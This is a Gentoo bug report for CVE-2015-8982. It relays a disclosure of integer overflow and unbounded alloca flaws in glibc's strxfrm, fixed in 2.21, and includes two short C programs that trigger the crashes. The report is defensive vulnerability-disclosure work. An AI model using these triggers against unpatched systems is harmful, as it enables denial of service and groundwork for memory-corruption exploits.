Bug 540070 (CVE-2015-8982)

Description Agostino Sarubbo 2015-02-14 16:03:30 UTC

From ${URL} :

1. Joseph Myers discovered strxfrm is vulnerable to integer overflows
when computing memory allocation sizes (similar to CVE-2012-4412). i.e.
in string/strxfrm_l.c:

  idxarr = (int32_t *) malloc ((srclen + 1) * (sizeof (int32_t) + 1));

Attached strxfrm-int32.c should trigger on 32-bit machines.

2. Shaun Colley discovered strxfrm falls back to an unbounded alloca if
malloc fails making it vulnerable to stack-based buffer overflows
(similar to CVE-2012-4424) [1]. Attached strxfrm-alloca.c should
trigger.


Both issues were fixed in glibc 2.21 [2] and a quick check shows
vulnerable code appears to go back to at least glibc 2.3.

Please allocate CVEs for these issues. Many thanks.

--mancha

==============

[1] https://sourceware.org/bugzilla/show_bug.cgi?id=16009
[2] https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=0f9e585480ed

/* gcc -o strxfrm-alloca strxfrm-alloca.c */

#include <string.h>
#include <stdlib.h>
#include <locale.h>

#define BUFLEN 512000
 
int main(void)
{
  char *src = malloc(BUFLEN + 1);
  char *dst = malloc(BUFLEN + 1);
  char *avail = NULL;

  memset(src, 'A', BUFLEN);
  setlocale(LC_ALL, "en_US.UTF-8");

  do
    avail = malloc(BUFLEN);
  while(avail);

  int len = strxfrm(dst, src, BUFLEN);
  return 0;
}

/* gcc -o strxfrm-int32 strxfrm-int32.c */

#include <string.h>
#include <stdlib.h>
#include <locale.h>

#define BUFLEN 858993459

int main(void)
{
  char *src = malloc(BUFLEN + 1);
  char *dst = malloc(BUFLEN + 1);

  memset(src, 'A', BUFLEN);
  setlocale(LC_ALL, "en_US.UTF-8");

  int len = strxfrm(dst, src, BUFLEN);
  return 0;
}



@maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.